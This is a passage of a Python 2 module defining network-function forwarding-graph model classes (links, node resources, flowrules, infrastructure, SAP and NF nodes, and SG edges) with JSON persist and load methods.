self.id, self.type, super(Element, self).__repr__())
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "%s(id:%s, type:%s)" % (self.__class__.__name__, self.id, self.type)
class Link(Element):
"""
Base class for different types of edges in the NF-FG.
"""
# Edge type constants:
# Static link --> physical link between saps and infras
STATIC = "STATIC"
# Dynamic link --> virtual link between nfs and infras created on demand
DYNAMIC = "DYNAMIC"
# SG next hop --> virtual link to describe connection between elements in SG
SG = "SG"
# Requirement --> virtual link to define constraints between SG elements
REQUIREMENT = "REQUIREMENT"
__slots__ = ('src', 'dst', 'constraints')
def __init__ (self, src, dst, type=None, id=None, constraints=None):
"""
Init.
:param src: source port
:type src: :any:`Port`
:param dst: destination port
:type dst: :any:`Port`
:param type: link type
:type type: str
:param id: optional id
:type id: str or int
:param constraints: optional Constraints object
:type constraints: :class:`Constraints`
:return: None
"""
super(Link, self).__init__(id=id, type=type)
if (src is not None and not isinstance(src, Port)) or \
(dst is not None and not isinstance(dst, Port)):
raise RuntimeError("Src and dst must be Port objects!")
# Reference to src Port object
self.src = src # mandatory
# Reference to dst Port object
self.dst = dst # mandatory
self.constraints = constraints if constraints is not None else Constraints()
def copy (self):
"""
Skip deepcopy of ``src`` and ``dst`` references in case the :any:`Link`
object is copied directly. Deepcopy called on an upper object has already
cloned the references when it gets to a Port object and it will skip the
re-cloning due to its internal memoization feature.
:return: copied object
:rtype: :any:`Link`
"""
tmp_src, tmp_dst = self.src, self.dst
self.src = self.dst = None
clone = super(Link, self).copy()
self.src, self.dst = tmp_src, tmp_dst
return clone
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
link = super(Link, self).persist()
link['src_node'] = self.src.node.id
link['src_port'] = self.src.id
link['dst_node'] = self.dst.node.id
link['dst_port'] = self.dst.id
constraints = self.constraints.persist()
if constraints:
link['constraints'] = constraints
return link
def load (self, data, container=None, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:param container: main container node
:type container: :any:`NFFGModel`
:return: None
"""
if container is None:
raise RuntimeError(
"Container reference is not given for edge endpoint lookup!")
super(Link, self).load(data=data)
self.src = container.get_port(data['src_node'], data['src_port'])
self.dst = container.get_port(data['dst_node'], data['dst_port'])
if self.src is None:
raise RuntimeError("Src not found with params: %s !" % data)
if self.dst is None:
raise RuntimeError("Dst not found with params: %s !" % data)
if 'constraints' in data:
self.constraints.load(data=data['constraints'])
return self
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return "<|ID: %s, Type: %s, src: %s[%s], dst: %s[%s] --> %s|>" % (
self.id, self.type, self.src.node.id, self.src.id, self.dst.node.id,
self.dst.id, super(Element, self).__repr__())
################################################################################
# ---------- NODE AND LINK RESOURCES, ATTRIBUTES -------------------
################################################################################
class DelayMatrix(Persistable):
"""
Delay Matrix keyed by Port IDs.
"""
__slots__ = ('matrix',)
def __init__ (self):
super(DelayMatrix, self).__init__()
self.matrix = OrderedDict()
def persist (self):
"""
Persist object.
:return: JSON representation
    :rtype: dict
"""
res = super(DelayMatrix, self).persist()
for k, v in self.matrix.iteritems():
if not isinstance(v, dict):
continue
for kk, vv in v.iteritems():
if k not in res:
res[k] = OrderedDict()
try:
res[k][kk] = float(vv)
except ValueError:
res[k][kk] = vv
return res
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
self.matrix.update(data)
return self
def is_empty (self):
"""
Check if matrix object is empty or not.
:return: is empty
:rtype: bool
"""
    return sum([len(self.matrix[src]) for src in self.matrix]) == 0
def add_delay (self, src, dst, delay):
"""
Add delay value with given ports.
:param src: source port object
:type src: :class:`Port`
:param dst: destination port object
:type dst: :class:`Port`
:param delay: delay value between ports
:type delay: int or float
:return: None
"""
if src not in self.matrix:
self.matrix[src] = OrderedDict()
self.matrix[src][dst] = delay
def get_delay (self, src, dst):
"""
Return delay value defined between given ports.
:param src: source port object
:type src: :class:`Port`
:param dst: destination port object
:type dst: :class:`Port`
:return: delay value
:rtype: int or float
"""
    # ids are always strings in the delay matrix because of the JSON standard
if src in self.matrix:
if dst in self.matrix[src]:
return self.matrix[src][dst]
def del_delay (self, src, dst):
"""
Remove delay value from matrix.
:param src: source port object
:type src: :class:`Port`
:param dst: destination port object
:type dst: :class:`Port`
:return: removed value
:rtype: int or float or None
"""
    # ids are always strings in the delay matrix because of the JSON standard
if src in self.matrix:
if dst in self.matrix[src]:
return self.matrix[src].pop(dst)
def __contains__ (self, item):
return item in self.matrix
def __getitem__ (self, item):
return self.matrix[item]
def __iter__ (self):
return ((src, dst, self.matrix[src][dst])
for src in self.matrix
for dst in self.matrix[src])
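# Illustrative sketch (hypothetical helper, not part of the original module):
# filling and querying a DelayMatrix; the port ids "p1"/"p2" are example values.
def _example_delay_matrix ():
  dm = DelayMatrix()
  dm.add_delay("p1", "p2", 0.5)
  assert dm.get_delay("p1", "p2") == 0.5
  # persist() returns a nested dict, e.g. {"p1": {"p2": 0.5}}
  return dm.persist()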
class NodeResource(Persistable):
"""
Class for storing resource information for Nodes.
"""
__slots__ = ('cpu', 'mem', 'storage', 'cost', 'zone', 'delay', 'bandwidth')
def __init__ (self, cpu=None, mem=None, storage=None, cost=None, zone=None,
delay=None, bandwidth=None):
"""
Init.
:param cpu: CPU resource
:type cpu: float
:param mem: memory resource
:type mem: float
:param storage: storage resource
:type storage: float
:param cost: cost
:type cost: float
:param zone: zone
:type zone: str
:param delay: delay property of the Node
:type delay: float
:param bandwidth: bandwidth property of the Node
:type bandwidth: float
:return: None
"""
super(NodeResource, self).__init__()
# container: compute
self.cpu = cpu
self.mem = mem
self.storage = storage
# container
self.cost = cost
self.zone = zone
self.delay = delay
self.bandwidth = bandwidth
def subtractNodeRes (self, subtrahend, maximal, link_count=1):
"""
Subtracts the subtrahend nffg_elements.NodeResource object from the current.
    Note: only the delay component is not subtracted; for now we neglect the
    load's influence on the delay. Link count identifies how many times the
    bandwidth should be subtracted. Throw an exception if any field of the
    'current' would exceed 'maximal' or get below zero.
:param subtrahend: the object to be subtracted from current
:type subtrahend: NodeResource
:param maximal: The maximal value which must not be exceeded.
:type maximal: NodeResource
    :param link_count: how many times the bandwidth component should be
      subtracted.
:type link_count: int
:return: self resource object
:rtype: :any:`NodeResource`
"""
attrlist = ['cpu', 'mem', 'storage', 'bandwidth'] # delay excepted!
if reduce(lambda a, b: a or b, (self[attr] is None for attr in attrlist)):
      raise RuntimeError("Node resource components should always be given! "
                         "One of %s's components is None" % str(self))
if not reduce(lambda a, b: a and b,
(-1e-6 <= self[attr] - subtrahend[attr] <= maximal[
attr] + 1e-6 for attr in attrlist if
attr != 'bandwidth' and subtrahend[attr] is not None)):
raise RuntimeError("Node resource got below zero, or "
"exceeded the maximal value!")
if subtrahend['bandwidth'] is not None:
if not -1e-6 <= self['bandwidth'] - link_count * subtrahend[
'bandwidth'] <= maximal['bandwidth'] + 1e-6:
raise RuntimeError("Internal bandwidth cannot get below "
"zero, or exceed the maximal value!")
for attr in attrlist:
k = 1
if attr == 'bandwidth':
k = link_count
if subtrahend[attr] is not None:
self[attr] -= k * subtrahend[attr]
return self
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
res = super(NodeResource, self).persist()
if self.cpu is not None:
res["cpu"] = self.cpu
if self.mem is not None:
res["mem"] = self.mem
if self.storage is not None:
res["storage"] = self.storage
if self.cost is not None:
res["cost"] = self.cost
if self.zone is not None:
res["zone"] = self.zone
if self.delay is not None:
res["delay"] = self.delay
if self.bandwidth is not None:
res["bandwidth"] = self.bandwidth
return res
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
self.cpu = float(data['cpu']) if 'cpu' in data else None
self.mem = float(data['mem']) if 'mem' in data else None
self.storage = float(data['storage']) if 'storage' in data else None
self.cost = data['cost'] if 'cost' in data else None
self.zone = float(data['zone']) if 'zone' in data else None
self.delay = float(data['delay']) if 'delay' in data else None
self.bandwidth = float(data['bandwidth']) if 'bandwidth' in data else None
return self
def __getitem__ (self, item):
"""
Return the resource attribute given by ``item``:
:param item: attribute name
:type item: str
:return: attribute value
:rtype: int or object
"""
if hasattr(self, item):
return getattr(self, item)
else:
raise KeyError(
"%s object has no key: %s" % (self.__class__.__name__, item))
def __setitem__ (self, key, value):
"""
Set the resource attribute given by ``key`` with ``value``:
:param key: attribute name
:type key: str
:param value: new value
:type value: int or object
:return: None
"""
if hasattr(self, key):
return setattr(self, key, value)
else:
raise KeyError(
"%s object has no key: %s" % (self.__class__.__name__, key))
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return "Resources of %s: cpu: %s, mem: %s, storage: %s, bandwidth: %s, " \
"delay: %s" % (self.__class__.__name__, self.cpu, self.mem,
self.storage, self.bandwidth, self.delay)
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "cpu: %s mem: %s storage: %s cost: %s zone: %s bandwidth: %s" \
" delay: %s" % (self.cpu, self.mem, self.storage, self.cost,
self.zone, self.bandwidth, self.delay)
def is_empty (self):
"""
    Return True if no resource value is set or all of them are 0.
    :return: all resource values are unset or 0
:rtype: bool
"""
return False if any((self.cpu, self.mem, self.storage, self.cost, self.zone,
self.delay, self.bandwidth)) else True
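# Illustrative sketch (hypothetical helper, not part of the original module):
# subtractNodeRes() books a demand against the current resources and raises
# RuntimeError on over-subscription; all values below are example numbers.
def _example_node_resource ():
  maximal = NodeResource(cpu=4, mem=4, storage=4, bandwidth=100)
  current = NodeResource(cpu=4, mem=4, storage=4, bandwidth=100)
  demand = NodeResource(cpu=1, mem=2, storage=0, bandwidth=10)
  current.subtractNodeRes(demand, maximal)  # current: cpu=3, mem=2, bandwidth=90
  try:
    current.subtractNodeRes(NodeResource(cpu=10, mem=0, storage=0, bandwidth=0),
                            maximal)
  except RuntimeError:
    pass  # cpu would get below zero
  return current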
class Flowrule(Element):
"""
Class for storing a flowrule.
"""
__slots__ = ('match', 'action', 'bandwidth', 'delay', 'cost', 'qos',
'external', 'constraints')
def __init__ (self, id=None, match="", action="", bandwidth=None, delay=None,
cost=None, qos=None, external=False, constraints=None):
"""
Init.
:param match: matching rule
:type match: str
:param action: forwarding action
:type action: str
:param bandwidth: bandwidth
:type bandwidth: float
:param delay: delay
:type delay: float
    :param external: mark the flowrule as external --> should not be processed
:type external: bool
:return: None
"""
super(Flowrule, self).__init__(id=id, type="FLOWRULE")
self.match = match # mandatory
self.action = action # mandatory
self.bandwidth = bandwidth
self.delay = delay
self.cost = cost
self.qos = qos
self.external = external
self.constraints = constraints if constraints is not None else Constraints()
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
flowrule = super(Flowrule, self).persist()
if self.match:
flowrule['match'] = self.match
if self.action:
flowrule['action'] = self.action
if self.bandwidth:
flowrule['bandwidth'] = self.bandwidth
if self.delay:
flowrule['delay'] = self.delay
if self.cost:
flowrule['cost'] = self.cost
if self.qos:
flowrule['qos'] = self.qos
if self.external:
flowrule['external'] = self.external
constraints = self.constraints.persist()
if constraints:
flowrule['constraints'] = constraints
return flowrule
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(Flowrule, self).load(data=data)
self.match = data.get('match')
self.action = data.get('action')
self.bandwidth = float(data['bandwidth']) if 'bandwidth' in data else None
self.delay = float(data['delay']) if 'delay' in data else None
self.cost = data.get('cost')
self.qos = data.get('qos')
    self.external = data.get('external', False)
if 'constraints' in data:
self.constraints.load(data=data['constraints'])
return self
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return "Flowrule object:\nmatch: %s\naction: %s\nbandwidth: " \
"%s\ndelay: %s\ncost: %s\nqos: %s\nexternal: %s" \
% (self.match, self.action, self.bandwidth, self.delay, self.cost,
self.qos, self.external)
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "%s(id:%s, match: %s, action: %s, bandwidth: %s, delay: %s," \
"cost: %s, qos: %s, external: %s)" % (self.__class__.__name__,
self.id, self.match,
self.action, self.bandwidth,
self.delay, self.cost,
self.qos, self.external)
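# Illustrative sketch (hypothetical helper, not part of the original module):
# a standalone flowrule and its JSON form; the match/action strings are only
# example values.
def _example_flowrule ():
  fr = Flowrule(id="fr1", match="in_port=1;TAG=sap1-nf1-42", action="output=2",
                bandwidth=50, delay=2.0)
  # persist() keeps only the fields that are actually set
  return fr.persist()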
class InfraPort(Port):
"""
Class for storing a port of Infra Node and handles flowrules.
"""
__slots__ = ('flowrules',)
def __init__ (self, node, id=None, name=None, properties=None, sap=None,
capability=None, technology=None, delay=None, bandwidth=None,
cost=None, controller=None, orchestrator=None, l2=None, l4=None,
metadata=None):
"""
Init.
:param node: container node
:type node: :any:`Node`
:param id: optional id
:type id: str or int
:param properties: supported properties of the port
:type properties: str or iterable(str)
:param metadata: metadata related to Node
:type metadata: dict
:return: None
"""
super(InfraPort, self).__init__(node=node, id=id, name=name,
properties=properties, sap=sap,
capability=capability,
technology=technology, delay=delay,
bandwidth=bandwidth, cost=cost,
controller=controller,
orchestrator=orchestrator, l2=l2, l4=l4,
metadata=metadata)
self.flowrules = []
def add_flowrule (self, match, action, bandwidth=None, delay=None, cost=None,
qos=None, id=None, external=False, constraints=None):
"""
Add a flowrule with the given params to the port of an Infrastructure Node.
:param match: matching rule
:type match: str
:param action: forwarding action
:type action: str
:param bandwidth: bandwidth
:type bandwidth: float
:param delay: delay
:type delay: float
:param id: specific id of the flowrule
:type id: str or int
:param external: marked as external
:type external: bool
:param constraints: additional constraint object
:type constraints: :class:`Constraints`
:return: newly created and stored flowrule
:rtype: :any:`Flowrule`
"""
flowrule = Flowrule(id=id, match=match, action=action, bandwidth=bandwidth,
delay=delay, cost=cost, qos=qos, external=external,
constraints=constraints)
self.flowrules.append(flowrule)
return flowrule
def del_flowrule (self, id=None, match=None, action=None):
"""
Remove the flowrule with the given id or all flowrules which match the given
action/match parameters.
:param id: flowrule id
:type id: int or str
:param match: matching rule
:type match: str
:param action: forwarding action
:type action: str
:return: the actual FlowRule is found and removed or not
:rtype: bool
"""
if id is not None:
for f in self.flowrules:
if f.id == id:
self.flowrules.remove(f)
return True
else:
deletable = []
ret = False
for f in self.flowrules:
if f.match == match or f.action == action:
deletable.append(f)
for f in deletable:
self.flowrules.remove(f)
ret = True
return ret
def clear_flowrules (self):
"""
Delete all the flowrules from the port.
:return: None
"""
del self.flowrules[:]
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
port = super(InfraPort, self).persist()
flowrules = [f.persist() for f in self.flowrules]
if flowrules:
port["flowrules"] = flowrules
return port
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(InfraPort, self).load(data=data)
    for fr in data.get('flowrules', ()):
      self.flowrules.append(Flowrule().load(data=fr))
    return self
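# Illustrative sketch (hypothetical helper, not part of the original module):
# attaching and removing flowrules on an InfraPort. ``infra_node`` is assumed
# to be a NodeInfra instance (defined further below); match/action strings are
# only example values.
def _example_infra_port_flowrules (infra_node):
  port = infra_node.add_port(id="port-example")
  port.add_flowrule(match="in_port=1", action="output=2", bandwidth=10)
  port.add_flowrule(match="in_port=2", action="output=1")
  port.del_flowrule(match="in_port=2")  # removes only the second rule
  return port.persist()                 # dict including the remaining flowrule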
################################################################################
# ------------------------ NF / SAP / INFRASTRUCTURE NODES -------------------
################################################################################
class NodeNF(Node):
"""
Network Function (NF) nodes in the graph.
"""
__slots__ = ('functional_type', 'deployment_type', 'resources',
'placement_criteria')
def __init__ (self, id=None, name=None, func_type=None, dep_type=None,
res=None):
"""
Init.
:param func_type: functional type (default: "None")
:type func_type: str
:param dep_type: deployment type (default: "None")
:type dep_type: str
:param res: optional NF resources
:type res: :any:`NodeResource`
:return: None
"""
super(NodeNF, self).__init__(id=id, type=Node.NF, name=name)
self.functional_type = func_type # mandatory
# container: specification
self.deployment_type = dep_type
self.resources = res if res is not None else NodeResource()
# container
# Internal attributes for mapping
self.placement_criteria = ()
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
node = super(NodeNF, self).persist()
if self.functional_type is not None:
node["functional_type"] = self.functional_type
specification = OrderedDict()
if self.deployment_type is not None:
specification["deployment_type"] = self.deployment_type
res = self.resources.persist()
if res:
specification["resources"] = res
if specification:
node["specification"] = specification
return node
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(NodeNF, self).load(data=data)
self.functional_type = data.get('functional_type')
if 'specification' in data:
self.deployment_type = data['specification'].get('deployment_type')
if 'resources' in data['specification']:
self.resources.load(data['specification']['resources'])
return self
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "%s(id:%s, type:%s)" % (
self.__class__.__name__, self.id, self.functional_type)
class NodeSAP(Node):
"""
Class for SAP nodes in the NF-FG.
"""
__slots__ = ('binding', 'placement_criteria')
def __init__ (self, id=None, name=None, binding=None, metadata=None):
"""
Init.
:param id: optional id
:type id: str or int
:param name: optional name
:type name: str
:param binding: interface binding
:type binding: str
:param metadata: metadata related to Node
:type metadata: dict
:return: None
"""
super(NodeSAP, self).__init__(id=id, type=Node.SAP, name=name,
metadata=metadata)
# Signals if the SAP is an inter-domain SAP
self.binding = binding
# Internal attributes for mapping
self.placement_criteria = ()
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "SAP(id: %s, name: %s)" % (self.id, self.name)
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return super(NodeSAP, self).__repr__()
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
sap = super(NodeSAP, self).persist()
if self.binding is not None:
sap['binding'] = self.binding
return sap
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(NodeSAP, self).load(data=data)
self.binding = data.get('binding')
return self
class NodeInfra(Node):
"""
Class for infrastructure nodes in the NF-FG.
"""
PORT_CLASS = InfraPort
# Defined Infra types
TYPE_BISBIS = "BiSBiS"
TYPE_EE = "EE" # default Execution Environment with NETCONF
TYPE_STATIC_EE = "STATIC" # Static EE probably will never use
TYPE_SDN_SWITCH = "SDN-SWITCH" # Common OVS switch - can't run NF
# Defined domain type
DEFAULT_DOMAIN = "VIRTUAL"
__slots__ = ('mapping_features', 'domain', 'infra_type', 'supported',
'resources', 'delay_matrix', 'availres', 'weight')
def __init__ (self, id=None, name=None, domain=None, infra_type=None,
supported=None, res=None, mapping_features=None):
"""
Init.
:param mapping_features: dict from features string to bool
:type mapping_features: dict
:param domain: domain of the Infrastructure Node
:type domain: str
:param infra_type: type of the Infrastructure Node
:type infra_type: int or str
:param supported: list of supported functional types
:type supported: list
:param res: optional Infra resources
:type res: :any:`NodeResource`
:return: None
"""
super(NodeInfra, self).__init__(id=id, type=Node.INFRA, name=name)
self.mapping_features = mapping_features if mapping_features else {}
self.domain = domain if domain is not None else self.DEFAULT_DOMAIN
self.infra_type = infra_type if infra_type is not None else \
self.TYPE_BISBIS
# Set supported types according to given param type
if isinstance(supported, basestring):
self.supported = [str(supported), ]
elif isinstance(supported, Iterable):
self.supported = [sup for sup in supported]
elif supported is None:
self.supported = []
# Set resource container
self.resources = res if res is not None else NodeResource()
self.delay_matrix = DelayMatrix()
# Internal attributes for mapping
self.availres = None
self.weight = None
def add_port (self, id=None, name=None, properties=None, sap=None,
capability=None, technology=None, delay=None, bandwidth=None,
cost=None, controller=None, orchestrator=None, l2=None, l4=None,
metadata=None):
"""
Add a port with the given params to the Infrastructure Node.
Override the basic ``add_port()`` to use :any:`InfraPort` objects.
:param id: optional id
:type id: str or int
:param properties: supported properties of the port
:type properties: str or iterable(str)
:param name: optional name
:type name: str
:param sap: inter-domain SAP identifier
:type sap: str
:param capability: optional capabilities
:type capability: str
:param technology: supported technologies
:type technology: str
:param delay: delay
:type delay: float
:param bandwidth: bandwidth
:type bandwidth: float
:param cost: cost
:type cost: str
:param controller: controller URL
:type controller: str
:param orchestrator: orchestrator URL
:type orchestrator: str
:param l2: l2 address
    :type l2: str
:param l4: l4 fields
:type l4: str
:param metadata: metadata related to Node
:type metadata: dict
:return: newly created and stored Port object
:rtype: :any:`InfraPort`
"""
port = InfraPort(self, id=id, name=name, properties=properties, sap=sap,
capability=capability, technology=technology, delay=delay,
bandwidth=bandwidth, cost=cost, controller=controller,
orchestrator=orchestrator, l2=l2, l4=l4, metadata=metadata)
self.ports.append(port)
return port
def add_supported_type (self, functional_type):
"""
Add a supported functional type or list of types to the Infrastructure Node.
:param functional_type: the functional type
:type functional_type: str or list or tuple
:return: the Node object to allow function chaining
:rtype: :any:`NodeInfra`
"""
if isinstance(functional_type, basestring):
self.supported.append(functional_type)
elif isinstance(functional_type, Iterable):
self.supported.extend(functional_type)
else:
raise RuntimeError("Not supported parameter type!")
return self
def has_supported_type (self, functional_type):
"""
    Return True if the Infra Node supports the given `functional_type`.
:param functional_type: functional type name
:type functional_type: str
:return: has the given functional type or not
:rtype: bool
"""
for ft in self.supported:
if ft == functional_type:
return True
return False
def del_supported_type (self, functional_type=None):
"""
Remove the given functional type from the Infrastructure Node. If no type
    is given then all supported types will be removed.
:param functional_type: the functional type
:type functional_type: str
:return: None
"""
if functional_type is None:
self.supported[:] = []
else:
self.supported.remove(functional_type)
def has_enough_resource (self, res):
"""
Checks whether this :any:`NodeInfra` has at least 'res' resources available.
    :param res: requested resources
:type res: :any:`NodeResource`
:return: has enough resource or not
:rtype: bool
"""
if not hasattr(self, 'availres'):
raise RuntimeError("Available resources not yet calculated for Infra %s!"
" Call calculate_available_node_res function first on "
"the containing NFFG instance!" % self.id)
try:
from copy import deepcopy
# do not do the actual subtraction!
availres = deepcopy(self.availres)
# throws RuntimeError if it couldn't be subtracted.
availres.subtractNodeRes(res, self.resources)
return True
except RuntimeError:
return False
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
node = super(NodeInfra, self).persist()
if self.domain is not None:
node["domain"] = self.domain
node["type"] = self.infra_type
supported = [sup for sup in self.supported]
if supported:
node['supported'] = supported
res = self.resources.persist()
if res:
node["resources"] = res
if self.mapping_features:
node['mapping_features'] = self.mapping_features.copy()
if not self.delay_matrix.is_empty():
node['delay_matrix'] = self.delay_matrix.persist()
return node
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(NodeInfra, self).load(data=data)
self.domain = data.get('domain', self.DEFAULT_DOMAIN) # optional
self.infra_type = data['type']
if 'supported' in data:
self.supported = data['supported']
if 'resources' in data:
self.resources.load(data['resources'])
if 'mapping_features' in data:
self.mapping_features = data['mapping_features']
if 'delay_matrix' in data:
self.delay_matrix.load(data['delay_matrix'])
return self
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "Infra(id: %s, name: %s, type: %s)" % (
self.id, self.name, self.infra_type)
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return super(NodeInfra, self).__repr__()
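# Illustrative sketch (hypothetical helper, not part of the original module):
# a minimal Infra node with resources and supported NF types; all ids, names
# and numbers below are example values.
def _example_node_infra ():
  infra = NodeInfra(id="bisbis1", name="example-BiSBiS",
                    infra_type=NodeInfra.TYPE_BISBIS,
                    res=NodeResource(cpu=8, mem=16, storage=10, bandwidth=1000))
  infra.add_supported_type(("firewall", "nat"))
  assert infra.has_supported_type("firewall")
  return infra.persist()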
################################################################################
# ---------- SG REQUIREMENTS / SG NEXT_HOPS / INFRASTRUCTURE LINKS -----------
################################################################################
class EdgeLink(Link):
"""
Class for static and dynamic links in the NF-FG.
Represent a static or dynamic link.
"""
__slots__ = ('backward', 'delay', 'bandwidth', 'cost', 'qos',
'availbandwidth', 'weight')
def __init__ (self, src=None, dst=None, type=None, id=None, backward=False,
delay=None,
bandwidth=None, cost=None, qos=None):
"""
Init.
:param src: source port
:type src: :any:`Port`
:param dst: destination port
:type dst: :any:`Port`
:param type: type of the link (default: Link.STATIC)
:type type: str
:param id: optional link id
:type id: str or int
    :param backward: the link is a backward link compared to another Link
:type backward: bool
:param delay: delay resource
:type delay: float
:param bandwidth: bandwidth resource
:type bandwidth: float
:param cost: cost
:type cost: str
:param qos: traffic QoS class
:type qos: str
:return: None
"""
type = type if type is not None else Link.STATIC
super(EdgeLink, self).__init__(src=src, dst=dst, type=type, id=id)
    # Signal if the link is a backward link compared to another existing
# Link with the same src and dst Node
self.backward = backward # always False by default
self.delay = delay # optional
self.bandwidth = bandwidth # optional
self.cost = cost
self.qos = qos
# Internal attributes for mapping
self.availbandwidth = None
self.weight = None
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
link = super(EdgeLink, self).persist()
if self.delay is not None:
link["delay"] = self.delay
if self.bandwidth is not None:
link["bandwidth"] = self.bandwidth
if self.cost is not None:
link["cost"] = self.cost
if self.qos is not None:
link["qos"] = self.qos
if self.backward:
link["backward"] = self.backward
return link
def load (self, data, container=None, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:param container: main container object
:type container: :any:`NFFGModel`
:return: None
"""
if container is None:
raise RuntimeError(
"Container reference is not given for edge endpoint lookup!")
for link in container.edge_links:
if link.id == data['id']:
raise RuntimeError("ID conflict during EdgeLink loading: %s" % link.id)
super(EdgeLink, self).load(data=data, container=container)
self.delay = float(data['delay']) if 'delay' in data else None
self.bandwidth = float(data['bandwidth']) if 'bandwidth' in data else None
self.cost = data.get('cost')
self.qos = data.get('qos')
self.backward = data.get('backward', False)
return self
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "EdgeLink(id: %s, src: %s[%s], dst: %s[%s], type: %s, backward: " \
"%s, delay:%s, bandwidth: %s, cost: %s, qos: %s)" % (
self.id, self.src.node.id, self.src.id, self.dst.node.id,
self.dst.id, self.type, self.backward, self.delay, self.bandwidth,
self.cost, self.qos)
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return "<|ID: %s, Type: %s, Back: %s, src: %s[%s], dst: %s[%s] --> %s|>" % (
self.id, self.type, self.backward, self.src.node.id, self.src.id,
self.dst.node.id, self.dst.id, super(Element, self).__repr__())
class EdgeSGLink(Link):
"""
Class for links of SG.
Represent an edge between SG elements.
"""
__slots__ = ('flowclass', 'tag_info', 'delay', 'bandwidth',
'additional_actions')
def __init__ (self, src=None, dst=None, id=None, flowclass=None,
tag_info=None,
delay=None, bandwidth=None, constraints=None,
additional_actions=None):
"""
Init.
:param src: source port
:type src: :any:`Port`
:param dst: destination port
:type dst: :any:`Port`
:param id: optional id
:type id: str or int
:param flowclass: flowclass of SG next hop link a.k.a a match
:type flowclass: str
:param tag_info: tag info
:type tag_info: str
:param delay: requested delay on the SG next hop
:type delay: float
:param bandwidth: requested bandwidth on the SG next hop
:type bandwidth: float
:param constraints: optional Constraints object
:type constraints: :class:`Constraints`
    :param additional_actions: additional (non traffic steering) actions in a
      flowrule
:type additional_actions: str
:return: None
"""
super(EdgeSGLink, self).__init__(src=src, dst=dst, type=Link.SG, id=id,
constraints=constraints)
self.flowclass = flowclass # flowrule without action
self.tag_info = tag_info
self.delay = delay
self.bandwidth = bandwidth
self.additional_actions = additional_actions
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
link = super(EdgeSGLink, self).persist()
if self.flowclass is not None:
link["flowclass"] = self.flowclass
if self.tag_info is not None:
link["tag_info"] = self.tag_info
if self.delay is not None:
link["delay"] = self.delay
if self.bandwidth is not None:
link["bandwidth"] = self.bandwidth
if self.additional_actions is not None:
link["additional_actions"] = self.additional_actions
return link
def load (self, data, container=None, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:param container: main container object
:type container: :any:`NFFGModel`
:return: None
"""
if container is None:
raise RuntimeError(
"Container reference is not given for edge endpoint lookup!")
for link in container.edge_sg_nexthops:
if link.id == data['id']:
raise RuntimeError(
"ID conflict during EdgeSGLink loading: %s" % link.id)
super(EdgeSGLink, self).load(data=data, container=container)
self.flowclass = data.get('flowclass')
self.tag_info = data.get('tag_info')
self.additional_actions = data.get('additional_actions')
self.delay = float(data['delay']) if 'delay' in data else None
self.bandwidth = float(data['bandwidth']) if 'bandwidth' in data else None
return self
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "SGLink(id: %s, src: %s[%s], dst: %s[%s], tag: %s, delay: %s, " \
"bandwidth: %s)" % (
self.id, self.src.node.id, self.src.id, self.dst.node.id,
self.dst.id, self.tag_info, self.delay, self.bandwidth)
class EdgeReq(Link):
"""
Class for constraint of networking parameters between SG elements.
  Class for requirements between arbitrary NF nodes.
"""
__slots__ = ('delay', 'bandwidth', 'sg_path')
def __init__ (self, src=None, dst=None, id=None, delay=None, bandwidth=None,
sg_path=None):
"""
Init.
:param src: source port
:type src: :any:`Port`
:param dst: destination port
:type dst: :any:`Port`
:param id: optional id
:type id: str or int
:param delay: delay resource
:type delay: float
:param bandwidth: bandwidth resource
:type bandwidth: float
:param sg_path: list of ids of sg_links represents end-to-end requirement
    :type sg_path: list or tuple
:return: None
"""
super(EdgeReq, self).__init__(src=src, dst=dst, type=Link.REQUIREMENT,
id=id)
self.delay = delay # optional
self.bandwidth = bandwidth # optional
# Set sg_path types according to given param type
if isinstance(sg_path, basestring):
self.sg_path = [str(sg_path), ]
elif isinstance(sg_path, Iterable):
self.sg_path = [p for p in sg_path]
elif sg_path is None:
self.sg_path = []
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
link = super(EdgeReq, self).persist()
